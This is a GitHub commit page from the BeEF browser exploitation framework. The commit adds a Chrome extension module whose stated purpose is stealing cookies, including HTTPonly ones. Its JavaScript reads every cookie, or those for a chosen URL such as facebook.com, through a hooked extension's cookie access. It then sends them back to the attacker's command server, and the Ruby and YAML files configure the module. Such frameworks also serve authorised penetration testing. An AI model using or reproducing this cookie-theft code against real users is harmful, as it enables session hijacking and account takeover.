Skip to content
Permalink
Browse files

Chrome extension module for stealling cookies inc. HTTPonly

  • Loading branch information
mike-at-aura committed May 29, 2012
1 parent 172ec56 commit 5aa2cefc431cf8feccb2c75ae91fa3f61ac5a303
@@ -0,0 +1,29 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
the_url = "<%== @url %>";
if (the_url != 'default_all') {
chrome.cookies.getAll({url:the_url}, function(cookies){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
})
} else {
chrome.cookies.getAll({}, function(cookies){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
})
}

});

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_all_cookies:
enable: true
category: "Chrome Extensions"
name: "Get All Cookies"
description: "Steal cookies even HTTPonly ones (providing the hooked extension has cookies access)<br />If a URL to steal cookies from is not specified then will steal _all_ cookies (this can be a lot!)"
authors: ["mh"]
target:
working: ["C"]
not_working: ["All"]
@@ -0,0 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_all_cookies < BeEF::Core::Command

def self.options

return [
{'name' =>'url', 'ui_label'=>'Domain to steal cookies from e.g. http://facebook.com', 'value' => 'default_all'}
]
end

def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end

end

0 comments on commit 5aa2cef

Please sign in to comment.
You can’t perform that action at this time.